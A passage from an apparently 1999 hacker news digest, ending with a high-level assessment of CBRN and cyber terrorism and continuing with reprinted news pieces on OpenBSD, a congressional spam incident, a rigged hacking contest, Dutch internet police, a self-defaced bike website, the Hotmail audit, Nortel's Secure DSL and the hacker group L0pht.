Several trends and developments are creating a new dynamic in the relationship between state sponsors and terrorist groups. In certain CBRN/Cyber areas, terrorist groups are less dependent on state sponsors because of widespread access to the Internet and other resources that make it relatively easy for terrorist groups to learn how to develop chemical or biological agents indigenously. Similarly, in terms of cyberwarfare, terrorist groups may have little need for state sponsors because much of the applicable software and hardware are available commercially and targeting can be accomplished from a computer terminal hundreds of miles away from the intended targets.

Terrorist groups are extremely vulnerable to deterrence by foreign intelligence and counterterrorism agencies. Thus, terrorist groups must overcome the continual possibility of their activities and operations being detected, monitored, penetrated and potentially preempted, interdicted or destroyed by these agencies.

Conclusion

CBRN/Cyber terrorist warfare is likely to pose a significant threat in the 21st century as a result of the confluence of motivation, technical capabilities, and involvement by state sponsors. This analysis is intended to highlight some of the internal and external factors, requirements and hurdles that need to be considered in assessing a terrorist group's current and future development status and operational capability to conduct CBRN/Cyber warfare.
Correlating these internal and external factors and hurdles would make it possible to forecast which terrorist groups and state sponsors are likely to embark on CBRN/Cyber warfare, the types of adaptations and changes they would require to transition to such warfare, the types of weapons and targeting they are likely to pursue (including the possible resort to single or multiple CBRN/Cyber weapons and devices), the timelines for such attacks, and vulnerabilities that could be exploited by foreign intelligence and counterterrorism agencies to constrain terrorist groups--and, when applicable, state sponsors--from embarking on such warfare.

@HWA

35.0 Theo de Raadt and OpenBSD Profiled
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com

contributed by Weld Pond
The Calgary Herald has published a profile of Theo de Raadt and arguably the most secure out of the box operating system there is, OpenBSD.

Calgary Herald
http://www.calgaryherald.com/business/technology/stories/990930/2929913.html

Calgarian heads team ensuring OpenBSD security
Theo de Raadt oversees hundreds of volunteer programmers

Matthew McClearn, Calgary Herald

With nearly two dozen computers scattered throughout his Ramsay district home, Theo de Raadt is well equipped to lead an international software project.

De Raadt has been working for three years on OpenBSD, a variant of the Unix operating system. Unix, favoured by academics, researchers and systems administrators for its power and flexibility, is the foundation for many popular operating systems, including Sun, Solaris and Linux.

What Linus Torvalds is to the increasingly popular Linux, de Raadt is to OpenBSD. He oversees hundreds of volunteer programmers who pore over OpenBSD's code trying to make it better, for little more than glory and the satisfaction of making software better.

Unlike any other operating system, OpenBSD is engineered from the ground up with security in mind.
"It's just a really cool process to be involved with," he says. "In two and a half years, we haven't found a vulnerability. That means in the first six months, we managed to get rid of them all."

That's in stark contrast to other operating systems, most notably Microsoft's ubiquitous Windows platform. Windows security flaws are discovered on a weekly basis.

In the early days of Unix, the University of California at Berkeley wanted to create its own strengthened version. Academics developed Net2, and attained a Berkeley Software Distribution (BSD) licence for it -- meaning, in short, that developers can modify it and users can install it freely at no cost.

The university eventually abandoned Net2 because of legal difficulties, but by then it had developed a considerable following. It spun off FreeBSD and NetBSD, two free operating systems.

De Raadt was a founder of NetBSD and worked on it for three years before splitting off following a bitter dispute.

In 1996, his computer was cracked by a friend. After hacking into each other's systems several times, the two began reviewing BSD's 350 megabytes of code looking for security holes. The task proved daunting. The harder they looked, the more problems they discovered.

More and more people pored over the body of code, corrected problems and submitted the improvements to de Raadt and his inner circle. That code became OpenBSD.

Three years later, de Raadt is still doing it. So far, he has spent $76,000 of his own money and dedicated many long days. A new version of OpenBSD comes out every six months. It can be downloaded for free at www.openbsd.org or purchased on CD-ROM for $30 US.

"I was eating Ichiban and Kraft Dinner because I was too poor to feed myself," he recalls. "Then we started selling CDs, and now things are OK."

OpenBSD is sold to the world from Calgary.
Louis Bertrand, an engineer who contributes to OpenBSD, explains that it couldn't be shipped from the United States because of that country's stringent encryption export laws, which are designed to keep cryptographic tools out of the hands of criminals and terrorists. Canada has no such restrictions. The CD label reads: "Made in Canada -- Land of Free Cryptography."

OpenBSD is earning respect for itself among security-conscious professionals at banks, research labs, government organizations, universities and other sites.

Bob Beck, secure systems specialist at the University of Alberta, says it's used extensively on campus.

"We don't have our OpenBSD machines broken into, and we like that," he says. "That's mainly due to people in the project going through and pro-actively auditing the code.

"It seems most vendors -- Sun, HP, Microsoft and others who sell commercial operating systems -- get their product working and they ship it. The pressure is to get the product to market fast."

Roy Brander, a research analyst for the City of Calgary's waterworks division, also admires OpenBSD.

"It's a very solid, stable operating system that doesn't go down," he says. "I wouldn't accuse other operating systems of being insecure -- OpenBSD can be made insecure if you're careless and other operating systems can be made secure if you're extremely careful -- but there's no question that out of the box, OpenBSD is one of the most secure operating systems you can get."

Though the server market is beginning to take notice, OpenBSD's user base is tiny compared even to Linux, which for all its fame accounts for a minuscule slice of the desktop operating system market -- less than five per cent. Brander estimates OpenBSD's installations in the tens of thousands.

Consequently, it has a comparatively small body of applications that work on it and device drivers for hardware can be hard to come by. For that reason, it's unlikely to crack the desktop market.
De Raadt has earned a reputation for not mincing words. He's openly critical of the process by which Linux has been developed. He's also unhappy with developers of commercial software vendors like Microsoft, Sun Microsystems and Hewlett-Packard, who, he says, take no responsibility for the numerous security holes in their products.

"They don't care and there's no one to tell them they have to care," he says. But, he adds, "security is starting to become something that affects the bottom line" and slowly the industry is being forced to address security issues.

While de Raadt has his critics, he is also respected for his talent and hard work. Those qualities would earn him big dollars in the corporate world and he says he gets a job offer every three days from venture capitalists. He doesn't take them.

"I'd feel guilty," he says. "I can actually provide something to the community that they'll use. If I were to work for Sun Microsystems, this wouldn't matter to their bottom line and I don't think it would see the light of day. I wouldn't actually be securing people's systems."

Beck adds that even if de Raadt wanted to make it commercial, his fellow programmers would abandon him.

"Going commercial would probably kill it, in my opinion. There would be much more of a pressure to get it to market quickly, rather than getting it to market correctly."

Fortunately for OpenBSD, de Raadt says the money can wait.

"If I had a lot of money, what would I do? I'd do this."

@HWA

36.0 SPAM HOUSE
~~~~~~~~~~

From Help Net Security http://www.net-security.org/

by BHZ, Tuesday 5th October 1999 on 1:07 pm CET
"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND LOSS 40 LBS. READ THIS! [sic]" - spam hit thousands of House of Representatives addresses. To make it all funnier, recipients hit the reply all button, so very fast mail servers were down:)

Wired.

The House of Spam on the Hill
by Declan McCullagh
3:00 a.m. 5.Oct.99.PDT

The spam began typically enough, with a mass email touting quick weight loss pills. But by last Friday, the trouble that started with a message sent by one Hill staffer to thousands of House of Representatives addresses had mushroomed, clogging inboxes, drawing angry accusations, and prompting mass email replies by anti-spam advocates that made the problem even worse.

"IF YOU'RE LOOKING TO LOSE WEIGHT PERMANENTLY AND YOU DON'T HAVE TIME TO SEEE AN EXPERT HERE'S THE PERFECT OPPORTUNITY. MY FRIEND LOSS 40 LBS. READ THIS! [sic]" wrote Cher Castillo, an aide to Rep. Alcee Hastings (D-FL), in the original message.

But many recipients directed their complaints to all the other recipients when they hit Reply All. This further jammed the already-taxed House mail servers, creating widespread annoyance, and preventing some House offices from receiving any email at all.

One response that was particularly ill-received came from Steve Maviglio, chief of staff for Rep. Rush Holt (D-NJ), who -- perhaps inadvertently -- replied to everyone, lecturing them on the evils of spam and requesting that they support his boss' anti-spam legislation.

"When I first got it [the spam], I immediately reported it to House Information Resources," he said.

Then Maviglio wrote, "How would you like to receive thousands of these each day??? Our constituents do -- costing them money and invading their privacy. Stop Spam!!!!"

And then? "I hit Reply All," he said. Maviglio said that Microsoft Exchange showed only a few dozen recipients. Ooops.

Some of the recipients -- there are about 20,000 Hill email addresses, though not all were copied -- thought that Maviglio had orchestrated the original diet pill spam to promote the so-called Can Spam Act that his office is co-sponsoring.

He denies it. "All I know is that my name showed up as the first one in many emails so people thought we did it. We're creative but not that creative. Besides, it's against House rules," he said.

A sampling of the hundreds of replies he received: "Undeliverable mail." "I hate you." "Take me off your list." "Die."

Some irked Hill staffers who saw their inboxes swell last Friday with "get-me-off-this-list" replies say that a new law isn't the answer.

"People are trying to blame other people to solve problems they caused themselves," said one aide, who asked not to be identified. "They should be disciplined."

Some Congressmen joined the fray, writing that Castillo had violated House rules, and other recipients warned that the diet pills suggested in the original message should not be used to lose weight.

Ironically, if the Can Spam Act had become law -- currently no hearings are scheduled -- Maviglio could be liable for a US$25,000 fine, or "the actual monetary loss suffered by the provider as a result of the violation," whichever is larger.

And what about Cher Castillo, the original spammer? Her office refused to comment and she did not respond to interview requests.

One staffer who complained to Hastings' office last week about Castillo said at first they didn't take the spam seriously. "But by today they weren't laughing," the staffer said.

@HWA

37.0 NET-SECURITY SITE INFO
~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/

by BHZ, Tuesday 5th October 1999 on 1:01 pm CET
Since yesterday, net-sec hosts two security sites: InterScape Security (http://interscape.net-security.org) and 403 forbiden (http://forbidden.net-security.org). Do check both of them. Also, Packet Storm Security mirrors the Default newsletter at http://packetstorm.securify.com/mag/default

@HWA

38.0 PCWEEKS' HACKER CHALLENGE "RIGGED" FOR NT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/

by Thejian, Tuesday 5th October 1999 on 5:30 am CET
There has been quite a lot of discussion on the usefulness of so-called "hack-the-box" contests. Well, ZDNet shows us how not to do it.
Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security patches to the Linux system which participated in the PCWeek hacker challenge, including one used by the cracker to gain access to the Linux server. ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise businesses would not want to apply 21 individual fixes and that most large companies would prefer the one large, sweeping-in-scope, fix. This objection didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test though.

Linux Today
http://linuxtoday.com/stories/10767.html

ZDNet Admits Mistakes in Recent Security Test
Oct 4, 1999, 23:19 UTC

[ The opinions expressed by authors on Linux Today are their own. They speak only for themselves and not for Linux Today. ]

By Arne W. Flones

Regarding the recent Hacker Shootout, ZDNet Labs today admitted that they deliberately ignored an embarrassing 21 security upgrades to one of the two systems under test. (See PC Week: CGI script opens door)

In this alleged test of security, ZDNet Labs invited "hackers" [sic] to try to break into two different computers, one running Windows NT and one running the Red Hat distribution of Linux. This came on the heels of August's similar battle between Windows NT and an Apple-based Linux distribution which drew a lot of publicity.

Under criticism from the Linux community for the lack of objectivity in the test, ZDNet's director, John Taschek responded,

    [The test] was designed and put together by PC Week for the purpose of testing security implementation. We don't care which operating system (if any) is broken into first. We want to establish the basis for a story on the best practices for implementing security.

And later he said,

    We don't care who wins or loses--in fact we're not looking to report a winner or loser. Just on implementations.

In spite of continued protests, the test proceeded and on September 24 the Linux site was cracked using a combination of a weakness in Web programming and a security hole in a program called crond, part of every Linux installation.

When the method used by the cracker was revealed, it was immediately apparent that both of the security holes could have easily been closed. The first hole, within a type of World Wide Web program called a CGI script, could have been avoided by paying closer attention to security when writing the script. This hole had nothing to do with Linux, but was in a separate application. The second hole had been publicly revealed in August by Red Hat, the distributor of the Linux system under test. Although ZDNet labs might have inadvertently slipped up on the first hole, they would have certainly known about the second. The cracker used both holes to crack into the system.

Today, ZDNet Labs revealed that they deliberately neglected to apply some 21 different recent security patches to the Linux system, including one used by the cracker to gain access to the Linux server. It is this admission that has raised the hackles of knowledgeable computer users, security experts and the Linux community.

As the source instructions which make up Linux are freely available to anybody who wants them, there are no reasons to wait to make security changes available to the public. So this number of security patches is common in the Linux world. As soon as a security hole is found, it is quickly patched and the fix is immediately posted to the public forums on the Net. The ability to look at all the source instructions enables anybody to verify the correctness of the patch. Typically, a program to exercise the exploitation is available as well. This dramatically reduces the risk in applying these patches. The scope of the changes is very narrow and is very easily tested in isolation.
Therefore, with a small effort, and in a very short time, an IT manager can know the impact the patch will have on her all-important systems. The result is that the patch can be applied quickly and with the assurance that nothing will break but the cracker's ability to compromise the company's data.

This is very unlike the Windows NT world, where Microsoft keeps all the source instructions secret. Microsoft Windows, by nature of its proprietary design, must withhold security information and release the fixes all at once in a larger, less frequent, service release. The policy of security through obscurity is arguable. But the impact of fixing security holes with an infrequent and all encompassing software upgrade is not. It can make testing a nightmare because individual fixes are not testable in exclusion of other changes. And, since Microsoft lumps the many security fixes with other, general improvements, adding a Microsoft service release enterprise-wide is a very, very risky affair. One never knows what will break.

Therefore, the rules of the game are very different for Windows than they are for Linux. ZDNet Labs conveniently ignores this fact.

ZDNet's response to the charges of the unfairness of omitting the 21 security patches was that enterprise businesses would not want to apply 21 individual fixes and that most large companies would prefer the one large, sweeping-in-scope, fix. ZDNet provides no basis for this absurd claim. Their claim goes against common practice in the industry and it is against common sense. It is only in the Microsoft world where an untestable, monolithic software release is preferable to a few much smaller, and manageable, perturbances.

Nota bene: ZDNet's objection to the 21 easily audited and tiny patches didn't prevent ZDNet Labs from hypocritically applying Microsoft's latest huge service release for Windows NT in time for the test.

ZDNet's claims are unsupportable.
Not only was ZDNet Labs responsible for allowing the installation of a flubbed CGI script which allowed the cracker to peek into the Linux system, they were negligent in ignoring 21 known security holes. Their admission today that they deliberately chose not to apply these patches has tainted their test. They knew that every cracker would look first at these 21 chinks in Linux's armor. No wonder it only took a few days for the Linux system to be cracked. ZDNet's incompetence assured it. This comes as close to professional malfeasance as I have ever seen. With today's knowledge it is impossible for ZDNet to claim even vestigial objectivity. With what we now know of this affair, to continue the charade would be an injustice.

@HWA

39.0 DUTCH "CYBERCOPS" PATROLLING THE NET
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 5:00 am CET

Dutch police opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud. The team will patrol the country's Internet sites in search of on-line crime, using new computer surveillance equipment and old-fashioned police techniques. The Internet officers will be able to tap phone lines and, with a court order, will be allowed to crack into computer systems to find incriminating evidence - the virtual equivalent of a search warrant.

Read more
http://www.techserver.com/noframes/story/0,2294,500041373-500067208-500122112-0,00.html

Dutch 'cybercops' to patrol information highway
Copyright © 1999 Nando Media
Copyright © 1999 Associated Press

AMSTERDAM, Netherlands (October 4, 1999 3:46 p.m. EDT http://www.nandotimes.com) - Dutch police opened their fight against Internet crime Monday by naming 15 "cybercops" to target on-line offenses ranging from pedophilia to credit-card fraud.
The team will patrol the country's Internet sites in search of on-line crime, using new computer surveillance equipment and old-fashioned police techniques. "They will go after all crime committed on the Internet and that could range from child pornography to credit card fraud, or the sale of illegal medicine and software," police spokesman Albert Folgerts said. The Internet officers will be able to tap phone lines and, with a court order, will be allowed to crack into computer systems to find incriminating evidence - the virtual equivalent of a search warrant.

@HWA

40.0 BIKE WEB SITE HACKS ITSELF
~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 4:10 am CET

Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced for the fourth time by the same hacker group in the past two weeks. "Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan Baxter finally responded by posting text and images that spoofed the company's image and security at its regular address, www.hoffmanbikes.com himself. Lol!

http://cnn.com/TECH/computing/9910/04/hacker.week/index.html

Bike Web site hacks itself after four attacks
By Robin Lloyd
CNN Interactive Senior Writer
October 4, 1999
Web posted at: 4:47 p.m. EDT (2047 GMT)

(CNN) -- Hack back. That's what Hoffman Bikes decided to do after its Web site was defaced for the fourth time by the same hacker group in the past two weeks. "Good riders, bad nerds," the group called "r 1 3 9" wrote, mockingly. Marketing director Bryan Baxter finally responded by posting text and images that spoofed the company's image and security at its regular address, www.hoffmanbikes.com. "If they wanted to make us look stupid, we decided to help them out," he said.
The site for the Oklahoma-based bike manufacturer was just one of some two dozen to be defaced by hackers in the past 10 days, according to attrition.org, a site that logs and mirrors Web defacements. But it was the only one to respond with humor. "We decided that if they were gonna get in that we would help them out," Baxter said. He crafted the site as an online catalog, not for e-commerce, so security was not a priority. "It's become a little soap opera," he said. "We just decided not to be too uptight about it. They could've done stuff that was a lot worse. They could've put porn up on it or something." Baxter put up the counter-hack himself, featuring a less-than-flattering picture of Matt Gipson, one of Hoffman's sponsored riders, with a pointer from his head to the words "duh, huh?" The counter-site also offered links to Hoffman's real site and the previous hacks to the site, as well as to lists for site visitors in case they wanted to join r 1 3 9 or get work at Hoffman or give it Internet security advice. That drew about 100 responses and dozens of phone calls.

'Learning as we go'

Baxter admitted that the rider-owned company is not "super good" yet at operating its Web site. "We're learning as we go," he said. Hoffman pays for its server time in kind from a friend in Texas. "We tried to change some things," after the first hack, he said. "We tried four times with different server settings and they were still getting in." So he gave up, in effect. If the site's security is breached again, Hoffman will just take its site down before trying again, he said. Patrice Rapalus, director of Computer Security Institute in San Francisco, said beefed up security, patching holes and reports to the authorities are recommended responses to hackers, not humor. Defacement, the equivalent of graffiti on a bricks and mortar business, is the least of a firm's computer security concerns, she said. That kind of hack is impossible to hide from consumers.
Many companies prefer to cover up the more serious hack -- intrusions into computer networks, she said. Companies hate to admit one likely scenario -- they are unaware that their security has been breached, Rapalus said. The number of companies reporting security breaches in the past three years rose from 17 percent to 32 percent, she said. And that's just the companies willing to own up to intrusions of which they are aware. Security breaches, even Web site defacements, mar a firm's image and can damage its electronic business. "It would undermine any kind of trust someone would have in your organization and the ability of your organization to safeguard confidential information or credit card information," she said. Brian Martin, of attrition.org, said that Hoffman's response to being hacked multiply was humorous but irresponsible. "It undermines the idea of secure Web sites and gives their customers the impression that the (site) administrator simply does not care about security that much," Martin said.

Smaller businesses at lower risk

Sites for government agencies and banks are far more attractive to hackers with criminal intent, Rapalus said. "Like anything else, it's follow the money," she said. CSI, a membership association, is comprised mainly of Fortune 500 firms and government agencies. A list of sites hacked in the past 10 days, as reported by attrition.org, also illustrates that point. They included DeltaNet, PanAmSat, a Le Monde publicity site, Altamira International Bank, Mount Gay Rum site, DC ArtBeat, Seoul National University, Web Yes Singapore and a State of Utah learning resources site. Smaller businesses, like larger ones, need to worry about online security as they launch Internet sites, Rapalus said, but they generally are not the focus of the most malicious hackers. She recommended a cooperative effort between law enforcement and industry to crack down on the big offenders.
Web site tallies hacks

Attrition.org has collected statistics on targets of hacking since it went online in 1995. By its count, there have been 79 hacks to general government systems, 27 to NASA, 19 to Army systems, 47 to other military systems, 103 to educational institutions and 1,042 to commercial systems. Groups called Antichrist and Forpaxe lead the pack, with 148 and 140 hacks credited to them by attrition.org. Global Hell, at least one of whose members recently was arrested as a result of FBI raids, gets credited with 118 hacks. More than 40 other groups are credited with anywhere from two to 50 hacks. Some hackers evidently see a credit on attrition.org as a badge of honor, with a group called TREATY's hack against IDG Co. claiming in the text of its defacement that it was "just doing it" to get mentioned on attrition.org.

No contact with hackers

Unlike many hacks, the r 1 3 9 defacements posted no e-mail contact for the group. Hackers are notorious for signing their work and offering a valid, but anonymous, mailbox. But Baxter, of Hoffman Bikes, said he suspected some of the e-mail the company received in response to its counter-hack were from r 1 3 9 members. Those correspondents said they would trade security advice for Matt Gipson autographs, the Hoffman sponsored rider. "We offered it to them, but we haven't gotten a response back yet," he said. Hoffman has decided against pressing charges or other legal action against the hackers even if they did come forward, Baxter said. "It appears we've turned it into a good thing, at least something entertaining. But it can be a very, very bad thing. I wish it wasn't possible to do."
@HWA

41.0 ARMY STUDYING IT RECRUITMENT
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:50 am CET

The Army has kicked off a yearlong study to help determine how to better recruit and maintain its information technology work force, with an emphasis on how the service can use financial inducements to attract workers. The charter of the Army Information Technology/Information Assurance Workforce Issues Study placed compensation first in the list of issues and challenges the Army must address to attract and retain IT personnel in a technology-driven economy. The study also will look at non-monetary inducements.

Read more
http://www.fcw.com/pubs/fcw/1999/1004/web-itsurvey-10-04-99.html

OCTOBER 4, 1999 . . . 14:56 EDT
Army studying IT recruitment
BY BOB BREWIN (antenna@fcw.com)

The Army has kicked off a yearlong study to help determine how to better recruit and maintain its information technology work force, with an emphasis on how the service can use financial inducements to attract workers. The charter of the Army Information Technology/Information Assurance Workforce Issues Study placed compensation first in the list of issues and challenges the Army must address to attract and retain IT personnel in a technology-driven economy. The study also will look at non-monetary inducements. Lt. Gen. Larry Ellis, Army deputy chief of staff for operations and plans, said the study will help the Army produce policy and resource recommendations to enhance IT recruitment, retention, education and training. In addition, the Army will use the study to develop a table of organization for its Force XXI digitized battleforce by next August. Gen. John Keane, Army vice chief of staff, described IT and information systems as the "dominant" issues the Army needs to keep in mind as it develops and fields the digitized battle force.
The soldiers and civilian Army employees who operate those Force XXI systems "will always remain the linchpin to ensure success in information dominance and to counter the continued threats and security issues for our information networks,'' Keane said in a Sept. 22 memo. Keane asked the help of all Army IT professionals in developing these new IT personnel policies and procedures by filling out an online survey (www.itiasurvey.army.pentagon.mil) no later than Nov. 20.

@HWA

42.0 TRUSTE OK'S HOTMAIL FIXES
~~~~~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Tuesday 5th October 1999 on 3:30 am CET

Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to the results of an outside audit released today. Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program Truste. Until today, however, there had been doubts about whether any results of the audit would be made public.

News.com
http://news.cnet.com/news/0-1005-200-807131.html?tag=st.ne.1002.tgif?st.ne.fd.gif.e

Truste OKs Hotmail security fixes
By Courtney Macavinta
Staff Writer, CNET News.com
October 4, 1999, 4:40 p.m. PT

Microsoft has fixed a security hole that threatened the privacy of its 40 million Hotmail users in August, according to the results of an outside audit released today. The announcement disclosed only that a "Big Five" accounting firm reviewed the "nature, extent, and cause of the problem," as well as the solutions that Microsoft put in place. As part of the audit, Microsoft employees who fixed the hole were interviewed, and the unnamed firm tested the solution to make sure the problem wouldn't reoccur.
As previously reported, the review of Hotmail was commissioned after the service was pulled offline for two hours when it was discovered that accounts could be accessed without passwords as long as a user's name--which is commonly found in a Hotmail address--was known. Microsoft said it fixed the problem the same day and has since admitted that the hole was the result of a string of code that hadn't been tested for security. Microsoft in August voluntarily agreed to the audit at the request of the Web privacy seal program Truste, which Microsoft generously sponsors. Until today, however, there had been doubts about whether any results of the audit would be made public. "Both Microsoft and Truste have confirmed that we've effectively resolved that incident, and that we are in compliance with Truste's licensing agreement," Richard Purcell, data practices director at Microsoft, said today. "The firm had technical experts, and they were careful about reviewing the solutions we put in place at the code level," he added. Truste monitors participating sites' privacy practices and ensures that licensees "help protect the security" of the information they collect and store.

Watchdogs skeptical

Based on guidelines set by the American Institute of Certified Public Accountants (AICPA), which oversees the conduct of major firms, Microsoft and others participating in the audit were restricted from releasing the accounting firm's full report. But consumer advocacy group Junkbusters had called for full disclosure of the report, insisting that if the results weren't made public, Hotmail users would have no assurance that their accounts are safeguarded. Despite the announcement that Hotmail is secure, Jason Catlett, founder of Junkbusters, was not satisfied with the level of detail in the companies' announcement.
"All Microsoft and Truste are saying is that someone went in with a notebook and pen and asked questions, but the company is not revealing the name of the auditor or the instructions to the auditor--the summary is vague," Catlett said. "They had the chance to commission an audit that could have been open." Specifically, Microsoft had commissioned an "Agreed-Upon Procedures Engagement," in which the parameters of the review are set by the certified public accountant, the client, and usually a specified third party, in this case Truste. The results of this type of report can only be made available to those parties, according to the AICPA. The online industry and the Clinton administration have endorsed so-called privacy seal programs as a way to safeguard anonymity. But as more Net users provide valuable personal information in exchange for goods and custom Web content, privacy advocates say better laws are needed to shield privacy, because industry guidelines don't come with strong enough enforcement. Truste says its voluntary efforts are effective. "From our point of view this does demonstrate that the resolution process we have in place works," said Bob Lewin, executive director of Truste. But for Microsoft, the review only puts to rest concern over the August 20 Hotmail security hole. The company has since been investigating programs that people could use to generate false passwords to crack open Hotmail accounts. "We can't prevent malicious hackers from targeting these platforms," Purcell added. "But it's important to say that we really have a strong sense of responsibility about protecting the security of customers' information."

@HWA

43.0 SECURE DSL TECHNOLOGY
~~~~~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 1:20 am CET

Nortel Networks has taken the wraps off a network-based secure digital subscriber line (DSL) technology.
The idea behind the technology, known as Secure DSL, is that it stops any electronic incursions or eavesdropping on the "always-on" DSL connections that many businesses and serious home users of the Internet are now starting to use. The system works by securing each DSL line with network-based, packet firewalls, so precluding outside attacks.

Full story
http://www.currents.net/newstoday/99/10/03/news5.html

Daily News
Secure DSL Technology
By Sylvia Dennis, Newsbytes.
October 03, 1999

Nortel Networks [NYSE:NT] has taken the wraps off a network-based secure digital subscriber line (DSL) technology. The idea behind the technology, known as Secure DSL, is that it stops any electronic incursions or eavesdropping on the "always-on" DSL connections that many businesses and serious home users of the Internet are now starting to use. The system works by securing each DSL line with network-based, packet firewalls, so precluding outside attacks. Nortel says that Secure DSL is one element of a suite of new capabilities announced today by Nortel Networks to enable mass market DSL and will be offered as a new feature on the Shasta Subscriber Service System (SSS). The SSS consists of a Shasta 5000 Broadband Service Node (BSN) with the IP (Internet Protocol) Service Operating System (iSOS) and Service Creation System (SCS). The BSN was developed by Shasta Networks, a company that Nortel acquired in March. Nortel says that the Shasta 5000 is currently deployed with several service providers around the world which are preparing for the transition to mass market deployment of DSL and other broadband access technologies. Initially, ten DSL service providers are offering the Secure DSL service to their subscribers: Cayman Systems, CopperCom, Efficient Networks, FlowPoint, Jetstream Communications, Netopia, Network TeleSystems, Promatory Communications, TollBridge Technologies, and Wind River Systems.
Anthony Alles, Nortel's general manager, said that, because DSL lines are typically always connected to the Internet, unlike the intermittent, dynamic connections of dialup networks, computers attached to DSL lines are exposed to Internet security attacks. As DSL becomes more widely deployed, he said, increasing numbers of DSL subscribers have reported attacks on their computers, sometimes leading to copying or destruction of sensitive data. "It's critically important for the rapid adoption of DSL that the DSL industry find an easy, cost-effective solution for securing always-on DSL lines," he said. Alles said that DSL is a mass market technology, and will be widely deployed to residential and small business customers, most of whom lack the technical skills and resources to deploy and maintain their own security systems. "Security is an expectation, not a feature, for the mass market, and DSL service providers which do not provide such integral security capabilities may find themselves at a severe competitive disadvantage," he said. Pricing on the Shasta 5000 BSN starts at $30,000 for ISPs and other interested carriers. Further details of the technology can be found on the Web at http://www.nortelnetworks.com/shasta .

@HWA

44.0 HACK, COUNTERHACK
~~~~~~~~~~~~~~~~~

From Help Net Security http://www.net-security.org/
by Thejian, Monday 4th October 1999 on 12:40 am CET

Here's another article on those "eight computer hackers in a dingy warehouse" called the L0pht. A bit of history and methodology of the group along with some interviewing; quite a good read.

Read it
http://www.nytimes.com/library/magazine/home/19991003mag-hackers.html

HacK, CouNterHaCk
The members of L0pht can knock you off line, steal your credit-card numbers and cut off the power for your whole neighborhood. But they'd like you to think they're the good guys.
By BRUCE GOTTLIEB
Photographs by DANA SMITH

"Would you like to see how to knock someone off the Web?" Silicosis asks.
Sili, as he is known, is a slim young man with serious eyes set deeply into a delicate face. He's the newest member of a hacker collective known as L0pht (pronounced "loft"). He becomes visibly uncomfortable when asked to talk about himself. He gives his age as "mid-20's" and then clams up. But when the conversation moves to hacking, Sili turns voluble: "I think it's a thrill to look at a program and figure out how to make that program do something that it was never designed to do in the first place. There's the challenge." We sit down at a computer monitor while Sili explains his latest discovery. By mimicking messages that typically flow between computers on a network, he can reach out to almost anyone running Windows 95, 98 or 2000 in a large corporate environment, or anyone using a cable modem, and forcibly disconnect them from the Web. In a demonstration of this, he types a one-line command on his computer and hits the return key with a flourish. Sure enough, the computer across the room, which seconds before had been connected to M.I.T.'s server, is now off line. The same technique, Sili explains, can be used to take information flowing between the Web and your neighbor's computer and reroute it into your own. A clever hacker could capture a neighbor's banking transactions, passwords or credit-card information. Sili published his research on L0pht's Web site in mid-August. The report was covered in the computer publication Infoworld and the on-line magazine ZDNet. At the time, a Microsoft spokesman, instead of denouncing L0pht, expressed the hope to reporters that the group would "design a more secure version of the protocol" -- a hackerproof set of operating instructions for the computer. This request strikes Sili as especially outrageous. "Why doesn't Ralph Nader just redesign the Corvair?" he asks. Nader is something of a role model at L0pht, a confederation of eight young hackers who position themselves, incredibly enough, as a consumer-advocacy group. 
But L0pht's tactics are a bit unorthodox: breaking into software systems and then posting instructions on how to do so on the Web, where they can be picked up by software designers and malicious hackers alike. Intrigued, I paid a visit to their workshop. L0pht's "laboratory" is the second floor of a ramshackle warehouse in suburban Boston. Predictably, the door to the lab has a sign for the pizza man -- "Domino's Knock Loudly." The eight men who make up L0pht allow themselves to be identified only by their screen names: Dr. Mudge, Space Rogue, Dildog, Brian Oblivion, Kingpin, Silicosis, Weld Pond and John Tan. They look to be in their 20's or 30's, but their six-room suite is an adolescent geek's fantasy clubhouse. One wall is papered with antiquated circuit boards while another has a signed picture from Julie, Penthouse Pet. Junk food in the cupboard is taken seriously. There are three different kinds of Cheez-Its: hot and spicy, plain and white cheddar. The warehouse brims with more than 200 computers ranging from state-of-the-art Sun and Digital workstations to nostalgia pieces like Commodore 64's and Apple IIe's. Black cables, yellow cables and jumbles of thin rainbow-colored wires drip from the ceiling, all jacked in to steel racks of oscilloscopes, radio transmitters, D.S.L. modems, I.S.D.N. modems, half-opened C.P.U.'s and a 50-foot roof antenna. The warehouse also contains several small-scale dummy computer networks. L0pht's "research" consists of trying to break into these internal systems. Upon discovering a security flaw in commercial-network software, the L0phties publish an advisory on their Web site. The advisory is a double-edged sword: a detailed description of the flaw — enough information for other hackers to duplicate the "exploit" — and a solution that tells network administrators how to close the loophole. L0pht's unorthodox methods have garnered praise from very unlikely quarters. 
